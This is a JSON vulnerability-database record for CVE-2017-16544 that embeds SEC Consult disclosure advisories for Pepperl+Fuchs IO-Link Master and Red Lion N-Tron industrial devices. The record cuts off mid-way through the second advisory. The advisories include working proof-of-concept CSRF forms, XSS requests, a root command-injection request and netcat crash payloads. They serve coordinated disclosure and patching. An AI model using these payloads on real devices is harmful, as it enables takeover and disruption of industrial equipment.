"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-16T00:00:00", "type": "vmware", "title": "VMware ESXi and vCenter Server updates address command injection and information disclosure vulnerabilities. (CVE-2017-16544, CVE-2019-5531, CVE-2019-5532, CVE-2019-5534)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544", "CVE-2019-5531", "CVE-2019-5532", "CVE-2019-5534"], "modified": "2019-09-19T00:00:00", "id": "VMSA-2019-0013.1", "href": "https://www.vmware.com/security/advisories/VMSA-2019-0013.1.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-01-13T15:29:21", "description": "", "cvss3": {}, "published": "2021-01-13T00:00:00", "type": "packetstorm", "title": "Pepperl+Fuchs IO-Link Master Series 1.36 CSRF / XSS / Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-16544", "CVE-2020-12511", "CVE-2020-12512", "CVE-2020-12513", "CVE-2020-12514"], "modified": "2021-01-13T00:00:00", "id": "PACKETSTORM:160933", "href": "https://packetstormsecurity.com/files/160933/Pepperl-Fuchs-IO-Link-Master-Series-1.36-CSRF-XSS-Command-Injection.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20210113-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: Pepperl+Fuchs IO-Link Master Series \nSee \"Vulnerable / tested versions\" \nvulnerable version: System 1.36 / Application 1.5.28 \nfixed version: System 1.52 / Application 1.6.11 \nCVE number: CVE-2020-12511, CVE-2020-12512, CVE-2020-12513, \nCVE-2020-12514 \nimpact: High \nhomepage: https://www.pepperl-fuchs.com \nfound: 2020-04-23 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Automation is our world. Perfect application solutions are our goal. \n \nIn 1945, Walter Pepperl and Ludwig Fuchs founded a small radio workshop in \nMannheim, Germany, based on the principles of inventiveness, entrepreneurial \nforesight, and self-reliance. The experience they acquired was transformed into \nnew ideas, and they continued to enjoy developing products for customers. The \neventual result was the invention of the proximity switch. This innovation rep- \nresented the starting point of the company's success story. \n \nToday, Pepperl+Fuchs is known by customers around the world as a pioneer and an \ninnovator in electrical explosion protection and sensor technology. Our main \nfocus is always on your individual requirements: With a passion for automation \nand groundbreaking technology, we are committed to working in partnership with \nyou now and in the future. We understand the demands of your markets, develop- \ning specific solutions, and integrating them into your processes.\" \n \nSource: https://www.pepperl-fuchs.com/usa/en/25.htm \n \n \nBusiness recommendation: \n------------------------ \nSEC Consult recommends to update the devices to the newest firmware packages \n(System 1.36 / Application 1.5.28), where the documented issues are fixed \naccording to the vendor. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511) \nThe web interface that is used to set all configurations, is vulnerable to \ncross-site request forgery attacks. An attacker can change settings via this \nway by luring the victim to a malicious website. \n \n2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512) \nAn authenticated reflected cross-site scripting can be triggered by issuing a \nPOST request to the \"/Software\" endpoint which is available on the web-service. \nAn attacker can abuse these vulnerabilities to steal cookies from the attacked \nuser in order to log on to the device. An attacker is also able to perform \nactions in the context of the attacked user. \n \n3) Authenticated Blind Command Injection (CVE-2020-12513) \nA command injection was identified in the web-interface. This vulnerability is \npresent because of unfiltered user input that is appended to a string which \ngets executed with \"exec()\". Commands are executed as root user. \n \n4) Null Pointer Dereference / DoS in \"discoveryd\" (CVE-2020-12514) \nThe discovery daemon (\"discoveryd\") is started during the bootup of the device. \nThe program is used for the network management program \"PortVision DX\". It is \ndesigned with unsafe functions and is vulnerable to a DoS attack. This is \ntriggered due to a null dereference in strlen. A debug mode is also available in \nthe program. This can be activated by starting the discovery daemon with \n\"discoveryd -vv\". All inputs are printed to the stdout during its execution \nwith this argument. This is not done in the productive device but can lead to \nmore severe attacks. \n \n5) Outdated and Vulnerable Software Components \nOutdated and vulnerable software components were found on the device during \na quick examination. \n \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scalable firmware runtime. \n \n \nProof of concept: \n----------------- \n1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511) \nThe following PoC can be used to change the hostname of the device to \"SEC- \nConsult\": \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"https://$IP/configuration_tab/ajax_comb_table_save/network_config/network_config_schema\" method=\"POST\"> \n<input type=\"hidden\" name=\"form\" \nvalue=\"Hostname=SEC-Consult&IPv4mode=static&IPv4address=1.101&IPv4netmask=255.255.255.0&IPv4gateway=1.1.12&DNSmode=manual&IPv4DNS1=&IPv4DNS2=&IpAddrCnflctDetectEnbl=enable&NtpServer=&SyslogServer=&SyslogPort=514&SshServerEnable=disable\" \n/> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512) \nBy sending the following request to the web-service, a reflected cross-site \nscripting vulnerability can be triggered: \n------------------------------------------------------------------------------- \nPOST /Software HTTP/1.1 \nHost: $IP \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 42 \nConnection: close \nCookie: ui_language=en_US; PHPSESSID=r7jtaceerqeijqr4b2dl0us814 \nUpgrade-Insecure-Requests: 1 \n \nlanguage=german'><script>alert(document.cookie)</script> \n------------------------------------------------------------------------------- \nThe server responds with the following content: \n------------------------------------------------------------------------------- \nHTTP/1.1 200 OK \nX-Powered-By: PHP/5.6.15 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nContent-type: text/html; charset=UTF-8 \nContent-Length: 11860 \nConnection: close \nDate: Thu, 01 Jan 1970 00:59:46 GMT \nServer: lighttpd/1.4.41 \n \n[...] \n \n<div class=\"page-content\"> \n<div class=\"page-header\"> \n<h1>Software <a href='/assets/WebHelp/german'><script>alert(document.cookie)</script>/advanced/software.htm' target='_blank'><img src='/assets/images/question_16.png' alt='Page-specific Help'></a></h1> \n<a class=\"latest-version\" href=\"#\">Check for latest version</a> \n</div> \n \n[...] \n------------------------------------------------------------------------------- \n \nPoC-Exploit code for the cross-site scripting vulnerability: \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://$IP/Software\" method=\"POST\"> \n<input type=\"hidden\" name=\"language\" value=\"german'><script>alert(document.cookie)</script>\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n3) Authenticated Blind Command Injection (CVE-2020-12513) \nBy entering a command in the field \"code\" under the tab \"IO-Link Test Event \nGeneration\" on the endpoint \"/Misc/Settings\" that is surrounded by \";\", it \ngets executed. The following POST request to the web-service demonstrates this \nwith the command \"ping 127.0.0.1\": \n------------------------------------------------------------------------------- \nPOST /index.php/ajax/generate_iolink_event/ HTTP/1.1 \nHost: $IP \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://$IP/Misc/Settings \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 101 \nConnection: close \nCookie: ui_language=en_US; PHPSESSID=lh8d4g4e8fm9f1732j9g6bm3a0 \n \nmode=single&type=message&instance=unknown&source=local&pdivalid=valid&code=0x0000%3Bping+127.0.0.1%3B \n------------------------------------------------------------------------------- \n \nThere is no response from the web-service which indicates to the attacker that \nthe command was executed. As this was tested on an emulated device only, the \ncommands were seen in the process list which proofed that it was executed \nas root: \n \n-bash-4.4# ps \nPID USER COMMAND \n[...] \n216 root /usr/sbin/restoremonitor \n272 root /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid \n333 root /apps/bin/appmgr \n347 root 05discoverd \n349 root 11iolinkconfigd \n353 root 90netconfig-saved \n354 root 90netconfig-working \n385 root lighttpd -f /apps/www/lighttpd.conf \n386 root /usr/bin/php-cgi \n387 root /usr/bin/php-cgi \n388 root /usr/bin/php-cgi \n389 root /usr/bin/php-cgi \n390 root /usr/bin/php-cgi \n391 root /usr/bin/php-cgi \n392 root config waitcmd working network /apps/bin/updateLighttpdAuth \n395 root /usr/bin/php-cgi \n397 root -bash \n399 root /usr/bin/php-cgi \n473 root udhcpc -R -n -O search -p /var/run/udhcpc.eth0.pid -i eth0 -x ho \n2519 root [kworker/u3:2] \n3173 root sh -c injectEvent -m single -t message -i unknown -s local -v va \n3175 root ping 127.0.0.1 \n3509 root 50ethernetip \n3541 root [10iolinkd] \n3544 root ps \n \n \n4) Null Pointer Dereference / DoS in \"discoverd\" (CVE-2020-12514) \nPayload for triggering a segmentation fault (caused by a null pointer dereference): \n$ echo -e \"\\xa9\\x8d\\xfd\\x53\\x03\\x8a\\x7c\\x32\\x00\\x00\\x02\\x00\\x0c\\x00\\x10\\x10\" | nc -u $IP 4606 \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xb6f5dfb4 in strlen () from /lib/libc.so.0 \n(gdb) \n \nPayload for writing ASCII characters in debug mode (\"discoveryd -vv\"). Register \nR4 can be controlled via a byte (filled with value \"\\xab\") also in normal mode \n(\"discoveryd\"): \n$ echo -e \"\\xa9\\x8d\\xfd\\x53\\x03\\x8a\\x7c\\x32\\x00\\x00\\x02\\x01\\x0c\\x00\\x10\\xab\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\\x73\\x65\\x63\" | nc -u $IP 4606 \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xb6f5dfb4 in strlen () from /lib/libc.so.0 \n(gdb) i r \nr0 0x0 0 \nr1 0x0 0 \nr2 0xbefffb9b 3204447131 \nr3 0x0 0 \nr4 0xab 171 \nr5 0x1da 474 \nr6 0xb6f8dbee 3069762542 \nr7 0x0 0 \nr8 0x0 0 \nr9 0x0 0 \nr10 0xb6ffef74 3070226292 \nr11 0xbefff574 3204445556 \nr12 0xb6f5dfb0 3069566896 \nsp 0xbefff558 0xbefff558 \nlr 0xaf9c 44956 \npc 0xb6f5dfb4 0xb6f5dfb4 <strlen+4> \ncpsr 0xa0000010 -1610612720 \nfpscr 0x0 0 \n \n \nMore bytes than in this payload will lead to another program execution path in \ndebug mode (\"discoveryd -vv\"). \n$ echo -e \n\"\\xa9\\x8d\\xfd\\x53\\x03\\x8a\\x7c\\x32\\x00\\x00\\x02\\x01\\x0c\\x00\\x10\\xab\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n| nc -u $IP 4606 \n \nOther program paths, depending on the current memory, can be triggered with \nthis payload in debug mode due to printf: \n$ echo -e \n\"\\xa9\\x8d\\xfd\\x53\\x03\\x8a\\x7c\\x32\\x00\\x00\\x02\\x01\\x0c\\x00\\x10\\xab\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n| nc -u $IP 4606 \n \nIn normal mode, only a null pointer dereference is triggered which leads to a \nprogram crash. \n \n \n5) Outdated and Vulnerable Software Components \n* PHP 5.6.15 \n* lighttpd 1.4.41 \n* OpenSSL 1.0.2j \n* Linux Kernel 2.6.30 \n* BusyBox 1.26.2 \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \nThe vulnerabilities 1), 2), 3) and 4) were manually verified on an emulated \ndevice by using the MEDUSA scalable firmware runtime. \n \n \nVulnerable / tested versions: \n----------------------------- \nThe IO-Link Master devices are sharing the same firmware base. The \nvulnerabilities were tested on an emulated firmware (system 1.36/ app EIP 1.5.28). \n \nAccording to the vendor, all firmware versions below 1.5.48 are vulnerable: \nIO-Link Master 4-EIP / <=1.5.48 \nIO-Link Master 8-EIP / <=1.5.48 \nIO-Link Master 8-EIP-L / <=1.5.48 \nIO-Link Master DR-8-EIP / <=1.5.48 \nIO-Link Master DR-8-EIP-P / <=1.5.48 \nIO-Link Master DR-8-EIP-T / <=1.5.48 \nIO-Link Master 4-PNIO / <=1.5.48 \nIO-Link Master 8-PNIO / <=1.5.48 \nIO-Link Master 8-PNIO-L / <=1.5.48 \nIO-Link Master DR-8-PNIO / <=1.5.48 \nIO-Link Master DR-8-PNIO-P / <=1.5.48 \nIO-Link Master DR-8-PNIO-T / <=1.5.48 \n \n \nVendor contact timeline: \n------------------------ \n2020-04-30 | Contacting VDE CERT through info@cert.vde.com. \n2020-07-29 | Received confirmation from VDE CERT. \n2020-07-31 | Call with P+F regarding vulnerabilities from this and another \nadvisory. \n2020-09-29 | Call with Pepperl+Fuchs and CERT@VDE regarding status. \n2020-10-02 | Received CVE IDs and preliminary advisory from VDE@CERT. \n2020-11-11 | Call with Pepperl+Fuchs regarding the patches. They should be \navailable within the next two weeks according to P+F. Agreed \nwith P+F and VDE CERT to release the security advisory next year. \n2020-12-14 | Received preliminary advisory from P+F. Set publication date to \n2021-01-04. \n2021-01-04 | Received final advisory from P+F. \n2021-01-13 | Coordinated release of security advisory. \n \n \nSolution: \n--------- \nUpdate the firmware to Application 1.6.11 / System 1.52 to resolve the security \nissues. \n \nAccording to Pepperl+Fuchs, the following steps are recommended to be taken: \n \n\"In order to prevent the exploitation of the reported vulnerabilities, we \nrecommend that the affected units be updated with the following three firmware \npackages: \n- U-Boot bootloader version 1.36 or newer \n- System image version 1.52 or newer \n- Application base version 1.6.11 or newer \n \nFurthermore, it is always recommended to observe the following measures if the \naffected products are connected to public networks: \n \n1. An external protective measure to be put in place. \nTraffic from untrusted networks to the device should be blocked by a firewall. \nEspecially traffic targeting the administration webpage. \n2. Device user accounts to be enabled with secure passwords. \nIf non-trusted people/applications have access to the network that the device \nis connected to, then configuring passwords for all three User Accounts \nis recommended.\" \n \nPepperl+Fuchs advisory page: \nhttps://www.pepperl-fuchs.com/germany/de/29079.htm \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2021 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160933/SA-20210113-0.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T19:31:25", "description": "", "cvss3": {}, "published": "2020-09-03T00:00:00", "type": "packetstorm", "title": "Red Lion N-Tron 702-W / 702M12-W 2.0.26 XSS / CSRF / Shell", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-16544", "CVE-2020-16204", "CVE-2020-16206", "CVE-2020-16208", "CVE-2020-16210"], "modified": "2020-09-03T00:00:00", "id": "PACKETSTORM:159064", "href": "https://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20200902-0 > \n======================================================================= \ntitle: Multiple Vulnerabilities \nproduct: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W \nvulnerable version: <=2.0.26 \nfixed version: \nCVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208, \nCVE-2020-16204 \nimpact: High \nhomepage: https://www.redlion.net/ \nfound: 2020-02-28 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"For over forty years, customers around the world have trusted Red Lion \nControls. Our award-winning industrial automation and \nnetworking solutions provide critical information and controls to \nimprove productivity, working with numerous devices and diverse \nprotocols to access data.\" \n \nSource: https://www.redlion.net \n \n \nBusiness recommendation: \n------------------------ \nThe vendor recommends to change the hardware and use a newer product. \nSEC Consult recommends to remove the device from productive environments. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210 \nA reflected cross-site scripting vulnerability was identified at the endpoint \n\"/pingtest_action.cgi\". An attacker is also able to perform actions in the \ncontext of the attacked user. \n \n2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206 \nStored cross-site scripting vulnerabilities are present on multiple endpoints. \nSuch placed payloads cannot be detected via browser-protection mechanisms as \nthey are embedded into the web-interface. \nAn attacker is also able to perform actions in the context of the attacked user. \n \n3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208 \nCSRF protection is not implemented at all. \nSuch a vulnerability enables an attacker to modify different configurations of \na device by luring an authenticated user to click on a crafted link. An \nattacker is able to take over the device by exploiting this vulnerability. \n \n4) Hidden OS Web-Shell Interface - CVE-2020-16204 \nAn undocumented interface, that contains a web-shell to the underlying OS, was \nfound to be present on the device. It is not referenced in the actual menu \nand is also not mentioned in the manual of the device. \nCommands can be executed as root on the device. A remote attacker can execute \nsystem commands via this way in combination with vulnerability #3. \n \nThis endpoint seems to be a leftover of the used Atheros SDK. \n \n5) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.11.0 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \n \n6) Outdated and Vulnerable Software Components \nOutdated and vulnerable software components were found on the device during \na quick examination. \n \nThe vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated \ndevice by using the MEDUSA scalable firmware runtime. \n \n \nProof of concept: \n----------------- \n1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210 \nThe \"pingtest_action.cgi\" endpoint can be used to trigger reflected XSS. \nhttp://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E \n \n2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206 \nInjection of a XSS payload is possible on multiple endpoints. An example \nfor permanent XSS on the endpoint \"/network.cgi\" is the following request: \n------------------------------------------------------------------------------- \nPOST /network.cgi HTTP/1.1 \nHost: $IP \nAccept-Encoding: gzip, deflate \nContent-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021 \nContent-Length: 915 \nAuthorization: Basic YWRtaW46YWRtaW4= \nConnection: close \nCookie: ui_language=en_US \nUpgrade-Insecure-Requests: 1 \n \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"netmode\" \n \nbridge \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"wlanipmode\" \n \n0 \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"brip\" \n \n192.168.1.202 \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"brmask\" \n \n255.255.255.0 \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"brgw\" \n \n192.168.1.1\"><script>alert(document.location)</script> \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"dns1\" \n \n \n-----------------------------195698564115308644282115103021 \nContent-Disposition: form-data; name=\"dns2\" \n \n \n-----------------------------195698564115308644282115103021-- \n------------------------------------------------------------------------------- \n \nThis can also be embedded in the HTML code as shown below: \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://$IP/network.cgi\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"hidden\" name=\"netmode\" value=\"bridge\" /> \n<input type=\"hidden\" name=\"wlanipmode\" value=\"0\" /> \n<input type=\"hidden\" name=\"brip\" value=\"192.168.1.202\" /> \n<input type=\"hidden\" name=\"brmask\" value=\"255.255.255.0\" /> \n<input type=\"hidden\" name=\"brgw\" value=\"192.168.1.1\"><script>alert(document.location+\" > SEC-Consult\")</script>\" /> \n<input type=\"hidden\" name=\"dns1\" value=\"\" /> \n<input 